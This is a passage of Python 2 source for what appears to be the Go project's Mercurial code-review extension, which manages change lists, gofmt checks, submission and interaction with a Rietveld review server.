        if item in l2:
            both.append(item)
    return both
# Return the remote ("default" path) repository object,
# preserving $http_proxy across the hg.repository call.
def getremote(ui, repo, opts):
    # save $http_proxy; creating the HTTP repo object will
    # delete it in an attempt to "help"
    proxy = os.environ.get('http_proxy')
    source, _, _ = hg.parseurl(ui.expandpath("default"), None)
    other = hg.repository(cmdutil.remoteui(repo, opts), source)
    if proxy is not None:
        # restore the proxy setting clobbered above
        os.environ['http_proxy'] = proxy
    return other
# Return the list of changesets present in the default remote
# but not in the local repository.
def Incoming(ui, repo, opts):
    _, incoming, _ = repo.findcommonincoming(getremote(ui, repo, opts))
    return incoming
# Run the user's editor on the CL text until it parses cleanly
# (or the user gives up). Returns '' on success, an error string otherwise.
def EditCL(ui, repo, cl):
    s = cl.EditorText()
    while True:
        s = ui.edit(s, ui.username())
        clx, line, err = ParseCL(s, cl.name)
        if err != '':
            if ui.prompt("error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err), ["&yes", "&no"], "y") == "n":
                return "change list not modified"
            continue
        # Copy the edited fields back into the live CL object.
        cl.desc = clx.desc;
        cl.reviewer = clx.reviewer
        cl.cc = clx.cc
        cl.files = clx.files
        if cl.desc == '':
            # Nag about an empty description; default answer re-opens the editor.
            if ui.prompt("change list should have description\nre-edit (y/n)?", ["&yes", "&no"], "y") != "n":
                continue
        break
    return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
# Returns (cl, err); err is '' on success.
def CommandLineCL(ui, repo, pats, opts):
    if len(pats) > 0 and GoodCLName(pats[0]):
        if len(pats) != 1:
            return None, "cannot specify change number and file names"
        if opts.get('message'):
            return None, "cannot use -m with existing CL"
        cl, err = LoadCL(ui, repo, pats[0], web=True)
        if err != "":
            return None, err
    else:
        # No CL number given: build a new CL from changed, unclaimed files.
        cl = CL("new")
        cl.local = True
        cl.files = Sub(ChangedFiles(ui, repo, pats, opts), TakenFiles(ui, repo))
        if not cl.files:
            return None, "no files changed"
    if opts.get('reviewer'):
        cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
    if opts.get('cc'):
        cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
    if cl.name == "new":
        if opts.get('message'):
            cl.desc = opts.get('message')
        else:
            # No -m given: open the editor for the description.
            err = EditCL(ui, repo, cl)
            if err != '':
                return None, err
    return cl, ""
# reposetup replaces cmdutil.match with this wrapper,
# which expands the syntax @clnumber to mean the files
# in that CL.
original_match = None
def ReplacementForCmdutilMatch(repo, pats=None, opts=None, globbed=False, default='relpath'):
    """cmdutil.match wrapper: expand @NNNNNN arguments into that CL's files.

    Interface matches cmdutil.match. Bug fix: the mutable default
    arguments (pats=[], opts={}) are replaced with None sentinels so a
    caller mutating the returned state can never poison later calls.
    Raises util.Abort for an invalid or unloadable CL name.
    """
    if pats is None:
        pats = []
    if opts is None:
        opts = {}
    taken = []   # the @clnumber patterns consumed here
    files = []   # files pulled in from the named CLs
    for p in pats:
        if p.startswith('@'):
            taken.append(p)
            clname = p[1:]
            if not GoodCLName(clname):
                raise util.Abort("invalid CL name " + clname)
            cl, err = LoadCL(repo.ui, repo, clname, web=False)
            if err != '':
                raise util.Abort("loading CL " + clname + ": " + err)
            files = Add(files, cl.files)
    pats = Sub(pats, taken) + ['path:'+f for f in files]
    return original_match(repo, pats=pats, opts=opts, globbed=globbed, default=default)
def RelativePath(path, cwd):
    """Return path relative to cwd when path lies inside cwd, else path unchanged.

    Bug fix: the original indexed path[n] unconditionally, which raised
    IndexError when path == cwd (startswith succeeds but there is no
    character at index n). Slicing path[n:n+1] is safe for that case.
    """
    n = len(cwd)
    if path.startswith(cwd) and path[n:n+1] == '/':
        return path[n+1:]
    return path
# Check that gofmt run on the list of files does not change them
# (raises util.Abort, or only warns when just_warn is True).
def CheckGofmt(ui, repo, files, just_warn=False):
    # Only Go source files under src/ are checked.
    files = [f for f in files if f.startswith('src/') and f.endswith('.go')]
    if not files:
        return
    cwd = os.getcwd()
    files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
    try:
        # gofmt -l lists the files that would be reformatted.
        cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
        cmd.stdin.close()
    except:
        raise util.Abort("gofmt: " + ExceptionDetail())
    data = cmd.stdout.read()
    errors = cmd.stderr.read()
    cmd.wait()
    if len(errors) > 0:
        ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
        return
    if len(data) > 0:
        msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
        if just_warn:
            ui.warn("warning: " + msg + "\n")
        else:
            raise util.Abort(msg)
    return
#######################################################################
# Mercurial commands

# Code review server host; may be overridden by [codereview] server in hgrc
# (see RietveldSetup).
server = "codereview.appspot.com"
# Base URL for CLs on the server; filled in during setup.
server_url_base = None
# every command must take a ui and a repo as arguments.
# opts is a dict where you can find other command line flags
#
# Other parameters are taken in order from items on the command line that
# don't start with a dash. If no default value is given in the parameter list,
# they are required.
#
def change(ui, repo, *pats, **opts):
    """create or edit a change list

    Create or edit a change list.
    A change list is a group of files to be reviewed and submitted together,
    plus a textual description of the change.
    Change lists are referred to by simple alphanumeric names.

    Changes must be reviewed before they can be submitted.

    In the absence of options, the change command opens the
    change list for editing in the default editor.

    Deleting a change with the -d or -D flag does not affect
    the contents of the files listed in that change.  To revert
    the files listed in a change, use

        hg revert @123456

    before running hg change -d 123456.
    """
    dirty = {}  # set of CL objects needing Flush at the end
    if len(pats) > 0 and GoodCLName(pats[0]):
        name = pats[0]
        if len(pats) != 1:
            return "cannot specify CL name and file patterns"
        pats = pats[1:]
        cl, err = LoadCL(ui, repo, name, web=True)
        if err != '':
            return err
        if not cl.local and (opts["stdin"] or not opts["stdout"]):
            return "cannot change non-local CL " + name
    else:
        # No CL number: create a new CL from the unclaimed changed files.
        name = "new"
        cl = CL("new")
        dirty[cl] = True
        files = ChangedFiles(ui, repo, pats, opts)
        taken = TakenFiles(ui, repo)
        files = Sub(files, taken)
    if opts["delete"] or opts["deletelocal"]:
        if opts["delete"] and opts["deletelocal"]:
            return "cannot use -d and -D together"
        flag = "-d"
        if opts["deletelocal"]:
            flag = "-D"
        if name == "new":
            return "cannot use "+flag+" with file patterns"
        if opts["stdin"] or opts["stdout"]:
            return "cannot use "+flag+" with -i or -o"
        if not cl.local:
            return "cannot change non-local CL " + name
        if opts["delete"]:
            if cl.original_author:
                return "original author must delete CL; hg change -D will remove locally"
            # -d also abandons and closes the CL on the server;
            # -D only deletes the local record (below).
            PostMessage(cl.name, "*** Abandoned ***", send_mail="checked")
            EditDesc(cl.name, closed="checked")
        cl.Delete(ui, repo)
        return
    if opts["stdin"]:
        # -i: read the CL text from standard input instead of an editor.
        s = sys.stdin.read()
        clx, line, err = ParseCL(s, name)
        if err != '':
            return "error parsing change list: line %d: %s" % (line, err)
        if clx.desc is not None:
            cl.desc = clx.desc;
            dirty[cl] = True
        if clx.reviewer is not None:
            cl.reviewer = clx.reviewer
            dirty[cl] = True
        if clx.cc is not None:
            cl.cc = clx.cc
            dirty[cl] = True
        if clx.files is not None:
            cl.files = clx.files
            dirty[cl] = True
    if not opts["stdin"] and not opts["stdout"]:
        # Default mode: open the CL in the editor.
        if name == "new":
            cl.files = files
        err = EditCL(ui, repo, cl)
        if err != "":
            return err
        dirty[cl] = True
    for d, _ in dirty.items():
        d.Flush(ui, repo)
    if opts["stdout"]:
        ui.write(cl.EditorText())
    elif name == "new":
        if ui.quiet:
            ui.write(cl.name)
        else:
            ui.write("CL created: " + cl.url + "\n")
    return
def code_login(ui, repo, **opts):
    """log in to code review server

    Logs in to the code review server, saving a cookie in
    a file in your home directory.
    """
    # MySend(None) authenticates (force_auth defaults to True) and then
    # returns without issuing any request.
    MySend(None)
def clpatch(ui, repo, clname, **opts):
    """import a patch from the code review server

    Imports a patch from the code review server into the local client.
    If the local client has already modified any of the files that the
    patch modifies, this command will refuse to apply the patch.

    Submitting an imported patch will keep the original author's
    name as the Author: line but add your own name to a Committer: line.
    """
    cl, patch, err = DownloadCL(ui, repo, clname)
    argv = ["hgpatch"]
    if opts["no_incoming"]:
        argv += ["--checksync=false"]
    if err != "":
        return err
    try:
        cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=True)
    except:
        return "hgpatch: " + ExceptionDetail()
    # Write the patch from a forked child so the parent can read hgpatch's
    # stdout without deadlocking on full pipes.
    if os.fork() == 0:
        cmd.stdin.write(patch)
        os._exit(0)
    cmd.stdin.close()
    out = cmd.stdout.read()
    if cmd.wait() != 0:
        return "hgpatch failed"
    cl.local = True
    # hgpatch prints the list of files it touched.
    cl.files = out.strip().split()
    files = ChangedFiles(ui, repo, [], opts)
    extra = Sub(cl.files, files)
    if extra:
        ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
    cl.Flush(ui, repo)
    ui.write(cl.PendingText() + "\n")
def download(ui, repo, clname, **opts):
    """download a change from the code review server

    Download prints a description of the given change list
    followed by its diff, downloaded from the code review server.
    """
    cl, patch, err = DownloadCL(ui, repo, clname)
    if err != "":
        return err
    ui.write(cl.EditorText() + "\n")
    ui.write(patch + "\n")
    return
def file(ui, repo, clname, pat, *pats, **opts):
    """assign files to or remove files from a change list

    Assign files to or (with -d) remove files from a change list.

    The -d option only removes files from the change list.
    It does not edit them or remove them from the repository.
    """
    # NOTE: the function name shadows the Python 2 builtin 'file';
    # it must match the hg command name, so it is kept as-is.
    pats = tuple([pat] + list(pats))
    if not GoodCLName(clname):
        return "invalid CL name " + clname
    dirty = {}  # CLs that need to be flushed back to disk
    cl, err = LoadCL(ui, repo, clname, web=False)
    if err != '':
        return err
    if not cl.local:
        return "cannot change non-local CL " + clname
    files = ChangedFiles(ui, repo, pats, opts)
    if opts["delete"]:
        oldfiles = Intersect(files, cl.files)
        if oldfiles:
            if not ui.quiet:
                # Echo the commands that would undo this removal.
                ui.status("# Removing files from CL. To undo:\n")
                ui.status("# cd %s\n" % (repo.root))
                for f in oldfiles:
                    ui.status("# hg file %s %s\n" % (cl.name, f))
            cl.files = Sub(cl.files, oldfiles)
            cl.Flush(ui, repo)
        else:
            ui.status("no such files in CL")
        return
    if not files:
        return "no such modified files"
    files = Sub(files, cl.files)
    taken = Taken(ui, repo)
    warned = False
    for f in files:
        if f in taken:
            if not warned and not ui.quiet:
                ui.status("# Taking files from other CLs. To undo:\n")
                ui.status("# cd %s\n" % (repo.root))
                warned = True
            ocl = taken[f]
            if not ui.quiet:
                ui.status("# hg file %s %s\n" % (ocl.name, f))
            if ocl not in dirty:
                # Remove all transferred files from the other CL at once.
                ocl.files = Sub(ocl.files, files)
                dirty[ocl] = True
    cl.files = Add(cl.files, files)
    dirty[cl] = True
    for d, _ in dirty.items():
        d.Flush(ui, repo)
    return
def gofmt(ui, repo, *pats, **opts):
    """apply gofmt to modified files

    Applies gofmt to the modified files in the repository that match
    the given patterns.
    """
    files = ChangedExistingFiles(ui, repo, pats, opts)
    files = [f for f in files if f.endswith(".go")]
    if not files:
        return "no modified go files"
    cwd = os.getcwd()
    files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
    try:
        cmd = ["gofmt", "-l"]
        if not opts["list"]:
            # Without --list, gofmt -w rewrites the files in place.
            cmd += ["-w"]
        if os.spawnvp(os.P_WAIT, "gofmt", cmd + files) != 0:
            raise util.Abort("gofmt did not exit cleanly")
    # Python 2 exception syntax: let hg Abort errors propagate unchanged.
    except error.Abort, e:
        raise
    except:
        raise util.Abort("gofmt: " + ExceptionDetail())
    return
def mail(ui, repo, *pats, **opts):
    """mail a change for review

    Uploads a patch to the code review server and then sends mail
    to the reviewer and CC list asking for a review.
    """
    cl, err = CommandLineCL(ui, repo, pats, opts)
    if err != "":
        return err
    cl.Upload(ui, repo, gofmt_just_warn=True)
    if not cl.reviewer:
        return "no reviewers listed in CL"
    # Compose the "Hello reviewers (cc: ...)" request message.
    pmsg = "Hello " + JoinComma(cl.reviewer)
    if cl.cc:
        pmsg += " (cc: %s)" % (', '.join(cl.cc),)
    pmsg += ",\n"
    pmsg += "\n"
    pmsg += "I'd like you to review the following change.\n"
    PostMessage(cl.name, pmsg, send_mail="checked", subject=cl.Subject())
def nocommit(ui, repo, *pats, **opts):
    """(disabled when using this extension)"""
    # Installed over commit|ci by uisetup so users must go through hg submit.
    return "The codereview extension is enabled; do not use commit."
def pending(ui, repo, *pats, **opts):
    """show pending changes

    Lists pending changes followed by a list of unassigned but modified files.
    """
    m = LoadAllCL(ui, repo, web=True)
    # NOTE: relies on Python 2 dict.keys() returning a list (sort() in place).
    names = m.keys()
    names.sort()
    for name in names:
        cl = m[name]
        ui.write(cl.PendingText() + "\n")
    files = DefaultFiles(ui, repo, [], opts)
    if len(files) > 0:
        s = "Changed files not in any CL:\n"
        for f in files:
            s += "\t" + f + "\n"
        ui.write(s)
# hg extension hook, called once per repository: install the
# @clnumber-expanding cmdutil.match wrapper and configure Rietveld.
def reposetup(ui, repo):
    global original_match
    if original_match is None:
        # Save and replace cmdutil.match exactly once.
        original_match = cmdutil.match
        cmdutil.match = ReplacementForCmdutilMatch
    RietveldSetup(ui, repo)
# Abort unless user (default: the configured [ui] username) appears in the
# CONTRIBUTORS file; returns the matching CONTRIBUTORS line.
def CheckContributor(ui, repo, user=None):
    if not user:
        user = ui.config("ui", "username")
        if not user:
            raise util.Abort("[ui] username is not configured in .hgrc")
    _, userline = FindContributor(ui, repo, user, warn=False)
    if not userline:
        raise util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
    return userline
def FindContributor(ui, repo, user, warn=True):
    """Look up user in the repository's CONTRIBUTORS file.

    user may be an email address or a full "Name <email>" line.
    Returns (email, line) on a match, (None, None) otherwise;
    raises util.Abort if the file cannot be opened.
    """
    try:
        f = open(repo.root + '/CONTRIBUTORS', 'r')
    except:
        raise util.Abort("cannot open %s: %s" % (repo.root+'/CONTRIBUTORS', ExceptionDetail()))
    for entry in f.readlines():
        entry = entry.rstrip()
        if entry.startswith('#'):
            continue
        m = re.match(r"(.*) <(.*)>", entry)
        if not m:
            continue
        if entry == user or m.group(2) == user:
            return m.group(2), entry
    if warn:
        ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
    return None, None
def submit(ui, repo, *pats, **opts):
    """submit change to remote repository

    Submits change to remote repository.
    Bails out if the local repository is not in sync with the remote one.
    """
    repo.ui.quiet = True
    if not opts["no_incoming"] and Incoming(ui, repo, opts):
        return "local repository out of date; must sync before submit"
    cl, err = CommandLineCL(ui, repo, pats, opts)
    if err != "":
        return err
    user = None
    if cl.original_author:
        user = cl.original_author
    userline = CheckContributor(ui, repo, user)
    # Build the R=/TBR=/CC= trailer appended to the commit message.
    about = ""
    if cl.reviewer:
        about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
    if opts.get('tbr'):
        tbr = SplitCommaSpace(opts.get('tbr'))
        cl.reviewer = Add(cl.reviewer, tbr)
        about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
    if cl.cc:
        about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
    if not cl.reviewer:
        return "no reviewers listed in CL"
    if not cl.local:
        return "cannot submit non-local CL"
    # upload, to sync current patch and also get change number if CL is new.
    if not cl.original_author:
        cl.Upload(ui, repo, gofmt_just_warn=True)
    # check gofmt for real; allowed upload to warn in order to save CL.
    cl.Flush(ui, repo)
    CheckGofmt(ui, repo, cl.files)
    about += "%s%s\n" % (server_url_base, cl.name)
    if cl.original_author:
        about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
    # submit changes locally
    date = opts.get('date')
    if date:
        opts['date'] = util.parsedate(date)
    opts['message'] = cl.desc.rstrip() + "\n\n" + about
    if opts['dryrun']:
        # Python 2 print statements.
        print "NOT SUBMITTING:"
        print "User: ", userline
        print "Message:"
        print Indent(opts['message'], "\t")
        print "Files:"
        print Indent('\n'.join(cl.files), "\t")
        return "dry run; not submitted"
    m = match.exact(repo.root, repo.getcwd(), cl.files)
    node = repo.commit(opts['message'], userline, opts.get('date'), m)
    if not node:
        return "nothing changed"
    # If the commit created a new head, the local repository was out of
    # date: roll the commit back and ask the user to sync first.
    log = repo.changelog
    rev = log.rev(node)
    parents = log.parentrevs(rev)
    if (rev-1 not in parents and
            (parents == (nullrev, nullrev) or
            len(log.heads(log.node(parents[0]))) > 1 and
            (parents[1] == nullrev or len(log.heads(log.node(parents[1]))) > 1))):
        repo.rollback()
        return "local repository out of date (created new head); must sync before submit"
    # push changes to remote.
    # if it works, we're committed.
    # if not, roll back
    other = getremote(ui, repo, opts)
    r = repo.push(other, False, None)
    if r == 0:
        repo.rollback()
        return "local repository out of date; must sync before submit"
    # we're committed. upload final patch, close review, add commit message
    changeURL = short(node)
    url = other.url()
    m = re.match("^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/", url)
    if m:
        changeURL = "http://code.google.com/p/%s/source/detail?r=%s" % (m.group(2), changeURL)
    else:
        print >>sys.stderr, "URL: ", url
    pmsg = "*** Submitted as " + changeURL + " ***\n\n" + opts['message']
    PostMessage(cl.name, pmsg, send_mail="checked")
    if not cl.original_author:
        # Only the CL owner can close the issue on the server.
        EditDesc(cl.name, closed="checked")
    cl.Delete(ui, repo)
def sync(ui, repo, **opts):
    """synchronize with remote repository

    Incorporates recent changes from the remote repository
    into the local repository.
    """
    if not opts["local"]:
        # Route pull output through sync_note, which drops noisy messages.
        ui.status = sync_note
        ui.note = sync_note
        other = getremote(ui, repo, opts)
        modheads = repo.pull(other)
        err = commands.postincoming(ui, repo, modheads, True, "tip")
        if err:
            return err
    sync_changes(ui, repo)
def sync_note(msg):
    # we run sync (pull -u) in verbose mode to get the
    # list of files being updated, but that drags along
    # a bunch of messages we don't care about.
    # omit them.
    boring = (
        'resolving manifests\n',
        'searching for changes\n',
        "couldn't find merge tool hgmerge\n",
    )
    if msg in boring:
        return
    sys.stdout.write(msg)
def sync_changes(ui, repo):
    # Look through recent change log descriptions to find
    # potential references to http://.*/our-CL-number.
    # Double-check them by looking at the Rietveld log.
    get = util.cachefunc(lambda r: repo[r].changeset())
    changeiter, matchfn = cmdutil.walkchangerevs(ui, repo, [], get, {'rev': None})
    n = 0
    for st, rev, fns in changeiter:
        if st != 'iter':
            continue
        n += 1
        if n > 100:
            # Only scan the 100 most recent changesets.
            break
        desc = repo[rev].description().strip()
        for clname in re.findall('(?m)^http://(?:[^\n]+)/([0-9]+)$', desc):
            if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
                # The CL was submitted: close it on the server and delete locally.
                ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
                cl, err = LoadCL(ui, repo, clname, web=False)
                if err != "":
                    ui.warn("loading CL %s: %s\n" % (clname, err))
                    continue
                EditDesc(cl.name, closed="checked")
                cl.Delete(ui, repo)
    # Remove files that are not modified from the CLs in which they appear.
    all = LoadAllCL(ui, repo, web=False)
    changed = ChangedFiles(ui, repo, [], {})
    for _, cl in all.items():
        extra = Sub(cl.files, changed)
        if extra:
            ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
            for f in extra:
                ui.warn("\t%s\n" % (f,))
            cl.files = Sub(cl.files, extra)
            cl.Flush(ui, repo)
        if not cl.files:
            ui.warn("CL %s has no files; suggest hg change -d %s\n" % (cl.name, cl.name))
    return
# hg extension hook: replace the built-in commit command with nocommit
# so that all commits go through hg submit instead.
def uisetup(ui):
    if "^commit|ci" in commands.table:
        commands.table["^commit|ci"] = (nocommit, [], "")
def upload(ui, repo, name, **opts):
    """upload diffs to the code review server

    Uploads the current modifications for a given change to the server.
    """
    repo.ui.quiet = True
    cl, err = LoadCL(ui, repo, name, web=True)
    if err != "":
        return err
    if not cl.local:
        return "cannot upload non-local change"
    cl.Upload(ui, repo)
    # Python 2 print statement: echo the CL's URL.
    print "%s%s\n" % (server_url_base, cl.name)
    return
# Command-line options shared by the mail and submit commands.
review_opts = [
    ('r', 'reviewer', '', 'add reviewer'),
    ('', 'cc', '', 'add cc'),
    ('', 'tbr', '', 'add future reviewer'),
    ('m', 'message', '', 'change description (for new change)'),
]
# Mercurial command table: command name -> (function, options, synopsis).
cmdtable = {
    # The ^ means to show this command in the help text that
    # is printed when running hg with no arguments.
    "^change": (
        change,
        [
            ('d', 'delete', None, 'delete existing change list'),
            ('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
            ('i', 'stdin', None, 'read change list from standard input'),
            ('o', 'stdout', None, 'print change list to standard output'),
        ],
        "[-d | -D] [-i] [-o] change# or FILE ..."
    ),
    "^clpatch": (
        clpatch,
        [
            ('', 'no_incoming', None, 'disable check for incoming changes'),
        ],
        "change#"
    ),
    # Would prefer to call this codereview-login, but then
    # hg help codereview prints the help for this command
    # instead of the help for the extension.
    "code-login": (
        code_login,
        [],
        "",
    ),
    "commit|ci": (
        nocommit,
        [],
        "",
    ),
    "^download": (
        download,
        [],
        "change#"
    ),
    "^file": (
        file,
        [
            ('d', 'delete', None, 'delete files from change list (but not repository)'),
        ],
        "[-d] change# FILE ..."
    ),
    "^gofmt": (
        gofmt,
        [
            ('l', 'list', None, 'list files that would change, but do not edit them'),
        ],
        "FILE ..."
    ),
    "^pending|p": (
        pending,
        [],
        "[FILE ...]"
    ),
    "^mail": (
        mail,
        review_opts + [
        ] + commands.walkopts,
        "[-r reviewer] [--cc cc] [change# | file ...]"
    ),
    "^submit": (
        submit,
        review_opts + [
            ('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
            ('n', 'dryrun', None, 'make change only locally (for testing)'),
        ] + commands.walkopts + commands.commitopts + commands.commitopts2,
        "[-r reviewer] [--cc cc] [change# | file ...]"
    ),
    "^sync": (
        sync,
        [
            ('', 'local', None, 'do not pull changes from remote repository')
        ],
        "[--local]",
    ),
    "^upload": (
        upload,
        [],
        "change#"
    ),
}
#######################################################################
# Wrappers around upload.py for interacting with Rietveld

# Placeholder diff uploaded by CreateIssue before any real diff exists.
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
# HTML form parser
class FormParser(HTMLParser):
    """Collect <input> and <textarea> form fields into self.map (name -> value)."""
    def __init__(self):
        self.map = {}        # field name -> field value
        self.curtag = None   # name of the <textarea> being read, if any
        self.curdata = None  # accumulated text of that <textarea>
        HTMLParser.__init__(self)
    def handle_starttag(self, tag, attrs):
        # Collapse the attribute pairs into a dict; later duplicates win,
        # matching a sequential scan of attrs.
        fields = {}
        for attr_name, attr_value in attrs:
            fields[attr_name] = attr_value
        if tag == "input":
            key = fields.get('name')
            if key is not None:
                if 'value' in fields:
                    self.map[key] = fields['value']
                else:
                    self.map[key] = ''
        if tag == "textarea":
            key = fields.get('name')
            if key is not None:
                self.curtag = key
                self.curdata = ''
    def handle_endtag(self, tag):
        if tag == "textarea" and self.curtag is not None:
            self.map[self.curtag] = self.curdata
            self.curtag = None
            self.curdata = None
    def handle_charref(self, name):
        # NOTE: unichr is Python 2 only.
        self.handle_data(unichr(int(name)))
    def handle_entityref(self, name):
        # htmlentitydefs is the Python 2 name of the entity table.
        import htmlentitydefs
        if name in htmlentitydefs.entitydefs:
            self.handle_data(htmlentitydefs.entitydefs[name])
        else:
            self.handle_data("&" + name + ";")
    def handle_data(self, data):
        if self.curdata is not None:
            self.curdata += data
# XML parser
# Fetch path from the code review server and parse it as XML;
# returns the ElementTree root, or None (after warning) on failure.
def XMLGet(ui, path):
    try:
        data = MySend(path, force_auth=False);
    except:
        ui.warn("XMLGet %s: %s\n" % (path, ExceptionDetail()))
        return None
    return ET.XML(data)
def IsRietveldSubmitted(ui, clname, hex):
    """Report whether the Rietveld issue clname records a submit of changeset hex."""
    feed = XMLGet(ui, "/rss/issue/" + clname)
    if feed is None:
        return False
    ns = "{http://www.w3.org/2005/Atom}"
    # Scan the feed's entry summaries for a "*** Submitted as ... ***" note.
    for summary in feed.findall(ns + "entry/" + ns + "summary"):
        text = summary.findtext("", None).strip()
        m = re.match('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*', text)
        if m is not None and len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
            return True
    return False
# Download the CL metadata and its most recent diff from the server.
# Returns (cl, diffdata, err); err is '' on success.
def DownloadCL(ui, repo, clname):
    cl, err = LoadCL(ui, repo, clname)
    if err != "":
        return None, None, "error loading CL %s: %s" % (clname, ExceptionDetail())
    # Grab RSS feed to learn about CL
    feed = XMLGet(ui, "/rss/issue/" + clname)
    if feed is None:
        return None, None, "cannot download CL"
    # Find most recent diff
    diff = None
    prefix = 'http://' + server + '/'
    for link in feed.findall("{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}link"):
        if link.get('rel') != 'alternate':
            continue
        text = link.get('href')
        if not text.startswith(prefix) or not text.endswith('.diff'):
            continue
        # Keep the last matching link (entries are in feed order).
        diff = text[len(prefix)-1:]
    if diff is None:
        return None, None, "CL has no diff"
    diffdata = MySend(diff, force_auth=False)
    # Find author - first entry will be author who created CL.
    nick = None
    for author in feed.findall("{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}author/{http://www.w3.org/2005/Atom}name"):
        nick = author.findtext("", None).strip()
        break
    if not nick:
        return None, None, "CL has no author"
    # The author is just a nickname: get the real email address.
    try:
        data = MySend("/user_popup/" + nick, force_auth=False)
    except:
        ui.warn("error looking up %s: %s\n" % (nick, ExceptionDetail()))
        cl.original_author = nick+"@needtofix"
        return cl, diffdata, ""
    match = re.match(r"<b>(.*) \((.*)\)</b>", data)
    if not match:
        return None, None, "error looking up %s: cannot parse result %s" % (nick, repr(data))
    if match.group(1) != nick and match.group(2) != nick:
        return None, None, "error looking up %s: got info for %s, %s" % (nick, match.group(1), match.group(2))
    email = match.group(1)
    # Temporary hack until we move to the public code review server.
    email1, _ = FindContributor(ui, repo, email, warn=False)
    if email1 == "":
        email = re.sub("@google.com$", "@golang.org", email)
    # Print warning if email is not in CONTRIBUTORS file.
    FindContributor(ui, repo, email)
    cl.original_author = email
    return cl, diffdata, ""
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend(request_path, payload=None,
        content_type="application/octet-stream",
        timeout=None, force_auth=True,
        **kwargs):
    """Sends an RPC and returns the response.

    Args:
        request_path: The path to send the request to, eg /api/appversion/create.
        payload: The body of the request, or None to send an empty request.
        content_type: The Content-Type header to use.
        timeout: timeout in seconds; default None i.e. no timeout.
            (Note: for large requests on OS X, the timeout doesn't work right.)
        kwargs: Any keyword arguments are converted into query string parameters.

    Returns:
        The response body, as a string.
    """
    # TODO: Don't require authentication. Let the server say
    # whether it is necessary.
    global rpc
    if rpc == None:
        rpc = GetRpcServer(upload_options)
    self = rpc
    if not self.authenticated and force_auth:
        self._Authenticate()
    if request_path is None:
        # No path: caller only wanted the authentication side effect.
        return
    old_timeout = socket.getdefaulttimeout()
    socket.setdefaulttimeout(timeout)
    try:
        tries = 0
        while True:
            tries += 1
            args = dict(kwargs)
            url = "http://%s%s" % (self.host, request_path)
            if args:
                url += "?" + urllib.urlencode(args)
            req = self._CreateRequest(url=url, data=payload)
            req.add_header("Content-Type", content_type)
            try:
                f = self.opener.open(req)
                response = f.read()
                f.close()
                return response
            # Python 2 exception syntax.
            except urllib2.HTTPError, e:
                if tries > 3:
                    raise
                elif e.code == 401:
                    # Unauthorized: authenticate and retry.
                    self._Authenticate()
                elif e.code == 302:
                    # Only chase redirects that lead to Google account login.
                    loc = e.info()["location"]
                    if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
                        return ''
                    self._Authenticate()
                else:
                    raise
    finally:
        socket.setdefaulttimeout(old_timeout)
def GetForm(url):
    """Fetch url and return its form fields as a dict, with CRLF normalized to LF."""
    parser = FormParser()
    parser.feed(MySend(url))
    parser.close()
    for key, value in parser.map.items():
        parser.map[key] = value.replace("\r\n", "\n")
    return parser.map
# Fetch the settings for the CL, like reviewer and CC list, by
# scraping the Rietveld editing forms.
def GetSettings(issue):
    # The /issue/edit page has everything but only the
    # CL owner is allowed to fetch it (and submit it).
    f = None
    try:
        f = GetForm("/" + issue + "/edit")
    except:
        pass
    if not f or 'reviewers' not in f:
        # Maybe we're not the CL owner. Fall back to the
        # /publish page, which has the reviewer and CC lists,
        # and then fetch the description separately.
        f = GetForm("/" + issue + "/publish")
        f['description'] = MySend("/"+issue+"/description", force_auth=False)
    return f
# Create a new Rietveld issue with a placeholder diff.
# Exits the process on failure (server returned an error body).
def CreateIssue(subject, desc):
    form_fields = [
        ("content_upload", "1"),
        # ("user", upload_options.email),
        ("reviewers", ''),
        ("cc", ''),
        ("description", desc),
        ("base_hashes", ""),
        ("subject", subject),
    ]
    uploaded_diff_file = [
        ("data", "data.diff", emptydiff),
    ]
    ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
    response = MySend("/upload", body, content_type=ctype)
    if response != "":
        # Python 2 print statement.
        print >>sys.stderr, "Error creating issue:\n" + response
        sys.exit(2)
# Update fields of the issue's edit form and resubmit it.
# Only non-None keyword arguments are changed. Exits the process on failure.
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=None):
    form_fields = GetForm("/" + issue + "/edit")
    if subject is not None:
        form_fields['subject'] = subject
    if desc is not None:
        form_fields['description'] = desc
    if reviewers is not None:
        form_fields['reviewers'] = reviewers
    if cc is not None:
        form_fields['cc'] = cc
    if closed is not None:
        form_fields['closed'] = closed
